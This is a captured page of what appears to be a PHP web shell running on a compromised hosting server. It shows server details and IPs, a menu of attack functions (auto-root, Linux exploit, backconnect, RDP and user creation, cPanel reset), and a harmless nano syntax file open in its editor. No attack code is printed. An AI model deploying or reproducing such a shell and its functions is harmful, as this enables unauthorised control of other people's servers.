Linux musi.iixcp.rumahweb.net 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64
LiteSpeed
: 103.247.9.165 | : 216.73.216.132
Cant Read [ /etc/named.conf ]
7.4.33
pliq4844
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
nano /
[ HOME SHELL ]
Name
Size
Permission
Action
ada.nanorc
1.24
KB
-rw-r--r--
asm.nanorc
687
B
-rw-r--r--
autoconf.nanorc
638
B
-rw-r--r--
awk.nanorc
1.32
KB
-rw-r--r--
c.nanorc
1.95
KB
-rw-r--r--
changelog.nanorc
800
B
-rw-r--r--
cmake.nanorc
788
B
-rw-r--r--
css.nanorc
505
B
-rw-r--r--
debian.nanorc
758
B
-rw-r--r--
default.nanorc
546
B
-rw-r--r--
elisp.nanorc
1.08
KB
-rw-r--r--
email.nanorc
333
B
-rw-r--r--
fortran.nanorc
1.92
KB
-rw-r--r--
gentoo.nanorc
4.13
KB
-rw-r--r--
go.nanorc
1.42
KB
-rw-r--r--
groff.nanorc
700
B
-rw-r--r--
guile.nanorc
586
B
-rw-r--r--
haskell.nanorc
1009
B
-rw-r--r--
html.nanorc
1.22
KB
-rw-r--r--
java.nanorc
654
B
-rw-r--r--
javascript.nanorc
822
B
-rw-r--r--
json.nanorc
856
B
-rw-r--r--
lua.nanorc
2.39
KB
-rw-r--r--
makefile.nanorc
536
B
-rw-r--r--
man.nanorc
727
B
-rw-r--r--
markdown.nanorc
947
B
-rw-r--r--
nanohelp.nanorc
418
B
-rw-r--r--
nanorc.nanorc
3.11
KB
-rw-r--r--
nftables.nanorc
926
B
-rw-r--r--
objc.nanorc
1.47
KB
-rw-r--r--
ocaml.nanorc
859
B
-rw-r--r--
patch.nanorc
600
B
-rw-r--r--
perl.nanorc
1.66
KB
-rw-r--r--
php.nanorc
1.05
KB
-rw-r--r--
po.nanorc
1.09
KB
-rw-r--r--
povray.nanorc
637
B
-rw-r--r--
python.nanorc
1.2
KB
-rw-r--r--
ruby.nanorc
1.49
KB
-rw-r--r--
rust.nanorc
1023
B
-rw-r--r--
sh.nanorc
1.5
KB
-rw-r--r--
spec.nanorc
1.97
KB
-rw-r--r--
sql.nanorc
2.85
KB
-rw-r--r--
tcl.nanorc
1.95
KB
-rw-r--r--
tex.nanorc
199
B
-rw-r--r--
texinfo.nanorc
540
B
-rw-r--r--
xml.nanorc
526
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sh.nanorc
## Syntax highlighting for Bourne shell scripts. syntax sh "(\.sh|(\.|/)(a|ba|c|da|k|mk|pdk|tc|z)sh(rc|_profile)?|/(etc/|\.)profile)$" header "^#!.*/((env\s+)?((a|ba|c|da|k|mk|pdk|tc|z)?sh)|busybox\s+sh|openrc-run|runscript)\>" header "-\*-.*shell-script.*-\*-" magic "(POSIX|Bourne-Again) shell script.*text" comment "#" linter dash -n # Function declarations. color brightgreen "^[A-Za-z0-9_-]+\(\)" # Keywords, symbols, and comparisons. color green "\<(break|case|continue|do|done|elif|else|esac|exit|fi|for|function|if|in|read|return|select|shift|then|time|until|while)\>" color green "\<(declare|eval|exec|export|let|local)\>" color green "[{}():;|`$<>!=&\\]" "(\]|\[)" color green "-(eq|ne|gt|lt|ge|le|ef|ot|nt)\>" # Short and long options. color brightmagenta "[[:blank:]]-[A-Za-z]\>" "[[:blank:]]--[A-Za-z-]+\>" # Common commands. color brightblue "\<(awk|cat|cd|ch(grp|mod|own)|cp|cut|echo|env|grep|head|install|ln|make|mkdir|mv|popd|printf|pushd|rm|rmdir|sed|set|sort|tail|tar|touch|umask|unset)\>" color normal "[.-]tar\>" # Basic variable names (no braces). color brightred "\$[-0-9@*#?$!]" "\$[[:alpha:]_][[:alnum:]_]*" # More complicated variable names; handles braces and replacements and arrays. color brightred "\$\{[#!]?([-@*#?$!]|[0-9]+|[[:alpha:]_][[:alnum:]_]*)(\[([[:space:]]*[[:alnum:]_]+[[:space:]]*|@)\])?(([#%/]|:?[-=?+])[^}]*\}|\[|\})" # Comments. color cyan "(^|[[:space:]])#.*" # Strings. color brightyellow ""(\\.|[^"])*"" "'(\\.|[^'])*'" # Trailing whitespace. color ,green "[[:space:]]+$"
Close